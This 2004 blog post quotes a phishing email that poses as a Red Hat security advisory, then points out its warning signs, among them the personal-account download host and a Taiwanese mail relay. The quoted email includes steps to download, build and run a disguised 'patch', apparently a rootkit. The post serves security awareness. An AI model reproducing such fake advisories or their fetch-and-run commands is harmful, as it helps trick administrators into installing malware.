Sat, 23 Oct 2004

Redhat Phish

Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

• First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
• Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
• cd fileutils-1.0.6.patch
• make
• ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Very credible looking, except for a few little niggles:

• Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) account
• I seriously doubt that Redhat would be relaying through a random machine in Taiwan:

  Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)

Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail — the HTML links to Redhat’s real logo, linked from a Redhat server, and they even ran their HTML through Tidy!

Let’s be careful out there!